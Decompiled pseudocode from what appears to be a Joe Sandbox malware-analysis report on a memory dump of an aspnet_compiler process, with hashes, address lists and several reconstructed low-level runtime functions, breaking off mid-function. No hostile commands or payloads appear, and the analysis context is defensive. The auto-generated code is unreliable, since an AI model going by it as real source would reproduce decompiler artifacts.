Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ada9dacb4acd0a02be1d569f2b10863917314825430a98e81c9f17d7a5ed32b5
Instruction ID: 70fe67c809e5d7d979e8d2ddd1922837fab7376dc30e012c028983a8a335fad1
Opcode Fuzzy Hash: ada9dacb4acd0a02be1d569f2b10863917314825430a98e81c9f17d7a5ed32b5
Instruction Fuzzy Hash: 1F416CB5A20209DFCF19CF58C490BAEBBF5FF89314F198069EA05AB344D774A941CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0126C182 Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E0126C182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E01267D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E01318D34(_v8, _t80);
					}
					E01262280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E0125FFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E01318833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E0125FFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E0128B180();
						if(_a4 != 0) {
							E01262280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E0126BB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E0126BB2D(_t16, _t15);
						E0126B944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E0125FFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E0125FFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E0125FFB0(0, __ecx, _t24);
				}
				return 0;
			}

0x0126c18d
0x0126c18f
0x0126c191
0x0126c19b
0x0126c1a0
0x0126c1d4
0x0126c1de
0x012b2d6e
0x0126c1e4
0x0126c1e4
0x0126c1e4
0x0126c1ec
0x012b2d7d
0x012b2d7d
0x0126c1f3
0x0126c1ff
0x012b2d88
0x012b2d8d
0x012b2d94
0x012b2d94
0x012b2d9f
0x012b2da4
0x012b2dab
0x012b2db0
0x012b2db2
0x012b2db3
0x012b2db4
0x012b2dbc
0x012b2dc3
0x012b2dc3
0x0126c205
0x0126c205
0x0126c208
0x0126c20e
0x0126c211
0x0126c216
0x0126c219
0x0126c21f
0x0126c222
0x0126c22c
0x0126c234
0x0126c23a
0x0126c23f
0x0126c245
0x0126c24b
0x0126c251
0x0126c25a
0x0126c276
0x0126c27d
0x0126c27d
0x0126c25c
0x0126c25c
0x00000000
0x0126c25e
0x0126c1a4
0x0126c1aa
0x0126c1b3
0x0126c265
0x0126c26c
0x0126c26c
0x00000000

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction ID: 504a8d2d30113a0f6a038398363a0d534e136eb5d6626761edab0673f0646393
Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction Fuzzy Hash: C5311471A21647EBD705FBB8C490BF9FB58BF52204F04415AC95C87281DB786A99CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 012C7016 Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E012C7016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x133d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E012C6B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E012C6B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E01267D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E01289AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E0128B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L01264620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}

0x012c7016
0x012c701e
0x012c702b
0x012c7033
0x012c7037
0x012c703c
0x012c703e
0x012c7041
0x012c7045
0x012c704a
0x012c7050
0x012c7055
0x012c705a
0x012c7062
0x012c7062
0x012c705a
0x012c7064
0x012c7064
0x012c7067
0x012c7071
0x012c7096
0x012c709b
0x012c70a2
0x012c70a6
0x012c70a7
0x012c70ad
0x012c70b3
0x012c70b6
0x012c70bb
0x012c70c3
0x012c70c3
0x012c70c6
0x012c70cd
0x012c70dd
0x012c70e0
0x012c70e2
0x012c70e2
0x012c70ee
0x012c7101
0x012c70f0
0x012c70f9
0x012c70f9
0x012c710a
0x012c710e
0x012c7112
0x012c7117
0x012c7118
0x012c7118
0x012c70bb
0x012c711d
0x012c7123
0x012c7131
0x012c7131
0x012c7136
0x012c713d
0x012c713e
0x012c713f
0x012c714a
0x012c714a
0x012c7084
0x012c7088
0x00000000
0x012c708e
0x012c708e
0x012c7092
0x00000000
0x012c7092

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aaf708afac1f5d41a894f87bbc74f4c40a69b3a6b9fd070f3aa5608baf9517b4
Instruction ID: d0dfd39b090fa2b4bcac9d59ee771fd1146e2ca34be43755a8166be62b3ad615
Opcode Fuzzy Hash: aaf708afac1f5d41a894f87bbc74f4c40a69b3a6b9fd070f3aa5608baf9517b4
Instruction Fuzzy Hash: 8F31B5726147529FC320DF28C841A7AB7E9BFD8B00F044A2DFA9597790E770E904CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0127A70E Relevance: .1, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0127A70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x1337b10; // 0x0
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x1337b10 = 8;
					 *0x1337b14 = 0x1337b0c;
					 *0x1337b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0x1
					E0127A990(0x1337b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L0127A840(__edx, __ecx, __ecx, _t52, 0x1337b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x1337b10; // 0x0
					_t3 = _t37 + 0x27; // 0x27
					__eflags = _t3 >> 5 -  *0x1337b18; // 0x0
					if(__eflags > 0) {
						_t38 =  *0x1337b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x27
						_v8 = _t4 >> 5;
						_t50 = L01264620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x1337b18 = _v8;
						_t8 = _t52 + 7; // 0x7
						E0128F3E0(_t50,  *0x1337b14, _t8 >> 3);
						_t28 =  *0x1337b14; // 0x0
						__eflags = _t28 - 0x1337b0c;
						if(_t28 != 0x1337b0c) {
							L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x8
						 *0x1337b14 = _t50;
						_t48 = _v12;
						 *0x1337b10 = _t9;
						goto L6;
					}
					 *0x1337b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}

0x0127a713
0x0127a714
0x0127a717
0x0127a71d
0x0127a720
0x0127a722
0x0127a727
0x0127a74a
0x0127a754
0x0127a75e
0x0127a768
0x0127a76a
0x0127a773
0x0127a78b
0x0127a790
0x0127a792
0x0127a741
0x0127a741
0x0127a743
0x0127a749
0x0127a749
0x0127a732
0x0127a73a
0x0127a797
0x0127a79d
0x0127a7a3
0x0127a7a9
0x0127a7b6
0x0127a7bc
0x0127a7ca
0x0127a7e0
0x0127a7e2
0x0127a7e4
0x012b9bf2
0x00000000
0x012b9bf2
0x0127a7ed
0x0127a7f2
0x0127a800
0x0127a805
0x0127a80d
0x0127a812
0x012b9c08
0x012b9c08
0x0127a818
0x0127a81b
0x0127a821
0x0127a824
0x00000000
0x0127a824
0x0127a7ae
0x00000000
0x0127a7ae
0x0127a73c
0x0127a73e
0x00000000

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4f37e0404772dbf9add53d163361b103aead80ff573ac8c7c078d18ef1b1584
Instruction ID: 4f4a73c329403736de123ef65c7f0665d03187c63c372ab984c7c61e0c498791
Opcode Fuzzy Hash: d4f37e0404772dbf9add53d163361b103aead80ff573ac8c7c078d18ef1b1584
Instruction Fuzzy Hash: E631CFF1620205DFD729CF18D881F6EBBFDFB85720F18495AE20687244D7B4A941CB95

Uniqueness

Uniqueness Score: -1.00%

Function 012761A0 Relevance: .1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E012761A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E01275E50(0x12267cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E01319D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E0124F7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}

0x012761b3
0x012761b5
0x012761bd
0x012761c3
0x012761c7
0x012761d2
0x012761ff
0x012761ff
0x01276201
0x01276207
0x01276207
0x012761d4
0x012761d9
0x00000000
0x00000000
0x012761df
0x012761e2
0x00000000
0x00000000
0x012761e6
0x012761e8
0x012761ee
0x012761ee
0x012761f9
0x012b762f
0x012b7632
0x012b7635
0x012b7639
0x012b7640
0x012b766e
0x012b7675
0x00000000
0x00000000
0x012b7681
0x012b7689
0x012b768d
0x012b7691
0x012b7695
0x012b7699
0x012b76af
0x012b76b5
0x012b76b7
0x012b76b7
0x012b76d7
0x012b76dc
0x00000000
0x012b76dc
0x012b76a2
0x012b76a9
0x012b7651
0x012b7653
0x012b7653
0x012b7656
0x012b7656
0x00000000
0x012b7656
0x012b7644
0x012b7646
0x012b7648
0x012b7648
0x00000000
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eba491444785029fe1830dc4095a85a06dfcb4c9588f8161504f361b7cdc7ed3
Instruction ID: 3c032b86a8a5dfe17d241f662a149eedf21f8c897a2e423a98f049845c1db50c
Opcode Fuzzy Hash: eba491444785029fe1830dc4095a85a06dfcb4c9588f8161504f361b7cdc7ed3
Instruction Fuzzy Hash: BA31AE716257028FE360CF0DC840B67BBE4FB98B00F08496DEA949B391E7B0E804CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0124AA16 Relevance: .1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E0124AA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x133d360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x1337b9c; // 0x0
					_t53 = L01264620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E0128B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E0128F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L01256C59(_t53, _t51, _t58) != 0) {
							_t28 = E01275E50(0x122c338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E0127B230(_v32, _v28, 0x122c2d8, 1,  &_v24);
								_t28 = E0124F7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}

0x0124aa25
0x0124aa29
0x0124aa2d
0x0124aa30
0x0124aa37
0x0124aa3c
0x012a4458
0x012a4458
0x012a4472
0x012a4474
0x012a4476
0x0124aa64
0x0124aa74
0x012a447c
0x012a4483
0x012a4492
0x0124aa52
0x0124aa54
0x0124aa5e
0x012a44a8
0x012a44ad
0x012a44af
0x012a44b6
0x012a44b6
0x012a44b9
0x012a44bc
0x012a44cd
0x012a44d3
0x012a44d6
0x012a44e1
0x012a44e1
0x012a44e6
0x012a44e8
0x012a44fb
0x012a44fb
0x012a44e8
0x00000000
0x0124aa5e
0x012a4476
0x0124aa42
0x0124aa46
0x0124aa48
0x0124aa4c
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4fa94687ce12c20a62aedf3d524c288e013b2c47a1b44ccb9df8dc6b44397eb
Instruction ID: 98453f675e671d32cac06305c9587ded9f1442e4eb644ab81a53acae3a304ebc
Opcode Fuzzy Hash: d4fa94687ce12c20a62aedf3d524c288e013b2c47a1b44ccb9df8dc6b44397eb
Instruction Fuzzy Hash: 2631C371A2022AABCB15AF68CD81ABFB7B8EF44700F454469F901EB250E7749D51CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 01284A2C Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E01284A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0x133d360 ^ _t62;
				_v8 =  *0x133d360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E01262280(_t26, 0x1338608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						E0125FFB0(_t41, _t51, 0x1338608);
						L2:
						 *0x133b1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return E0128B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E01262280(_t28, 0x1338608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							E0125FFB0(_t42, _t53, 0x1338608);
							if(_t53 != 0) {
								L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						E0125FFB0(_t41, _t51, 0x1338608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}

0x01284a2c
0x01284a34
0x01284a3c
0x01284a3e
0x01284a48
0x01284a4b
0x01284a4d
0x01284a51
0x01284a9c
0x00000000
0x00000000
0x01284aa3
0x01284aa8
0x01284aad
0x01284ab1
0x01284ade
0x01284ae3
0x01284a5a
0x01284a62
0x01284a6a
0x01284a6e
0x012bf203
0x01284a84
0x01284a88
0x01284a89
0x01284a8a
0x01284a95
0x01284a95
0x01284a79
0x01284a80
0x01284af2
0x01284af4
0x01284af9
0x01284aff
0x01284b01
0x01284b03
0x01284b08
0x012bf20a
0x012bf212
0x012bf216
0x012bf216
0x01284b08
0x01284b13
0x01284b1a
0x012bf229
0x012bf229
0x01284b1a
0x01284a82
0x00000000
0x01284a82
0x01284ab7
0x01284acd
0x01284acd
0x01284ad5
0x01284ada
0x00000000
0x01284ada
0x01284ac2
0x01284acb
0x00000000
0x00000000
0x00000000
0x01284acb
0x01284a53
0x01284a53
0x01284a58
0x00000000

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 549052cb6284210835c5cd7b19f5cf6057f766d09522b269bf81274db993c966
Instruction ID: eef64499651cbc85cda28490126dd70fbf38952ff6b9dddf369780e27ba7d258
Opcode Fuzzy Hash: 549052cb6284210835c5cd7b19f5cf6057f766d09522b269bf81274db993c966
Instruction Fuzzy Hash: 1C31E4322263939BD721BF58C985B2AFBA4FFC0B14F014559EA564B681C7B4E844CB89

Uniqueness

Uniqueness Score: -1.00%

Function 01288EC7 Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E01288EC7(void* __ecx, void* __edx) {
				signed int _v8;
				signed int* _v16;
				intOrPtr _v20;
				signed int* _v24;
				char* _v28;
				signed int* _v32;
				intOrPtr _v36;
				signed int* _v40;
				signed int* _v44;
				signed int* _v48;
				intOrPtr _v52;
				signed int* _v56;
				signed int* _v60;
				signed int* _v64;
				intOrPtr _v68;
				signed int* _v72;
				char* _v76;
				signed int* _v80;
				signed int _v84;
				signed int* _v88;
				intOrPtr _v92;
				signed int* _v96;
				intOrPtr _v100;
				signed int* _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				signed int* _v152;
				char _v156;
				signed int* _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x133d360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E01274E70(0x13386e4, 0x1289490, 0, 0);
					if( *0x13353e8 > 5 && E01288F33(0x13353e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x13353e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x13353e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x122bc46;
						_t48 = E012C7B9C(0x13353e8, 0x122bc46, _t67, 0x13353e8, _t70,  &_v140);
					}
				}
				return E0128B640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}

0x01288ec7
0x01288ed9
0x01288edc
0x01288ee6
0x01288ee9
0x01288eee
0x01288efc
0x01288f08
0x012c1349
0x012c1353
0x012c135d
0x012c1366
0x012c136f
0x012c1375
0x012c137c
0x012c1385
0x012c1390
0x012c1391
0x012c139c
0x012c139d
0x012c13a6
0x012c13ac
0x012c13b2
0x012c13b5
0x012c13bc
0x012c13bf
0x012c13c2
0x012c13c5
0x012c13c8
0x012c13cb
0x012c13ce
0x012c13d1
0x012c13d4
0x012c13d7
0x012c13da
0x012c13dd
0x012c13e0
0x012c13e3
0x012c13e6
0x012c13e9
0x012c13f6
0x012c1400
0x012c1400
0x01288f08
0x01288f32

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0752c872c91e7e38ed5178248761ebe1a3c2508ac58abcf276d313a882f91ffb
Instruction ID: 2d0e2d782ccfb6a0024d8c517247852a479f1cd6989458f94e2d09d37bb2bd96
Opcode Fuzzy Hash: 0752c872c91e7e38ed5178248761ebe1a3c2508ac58abcf276d313a882f91ffb
Instruction Fuzzy Hash: D741C2B1D113189FDB20DFAAD981AADFBF4FB48710F9041AEE609A7240E7705A84CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0127E730 Relevance: .1, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E0127E730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E01289670() < 0) {
					L0129DF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
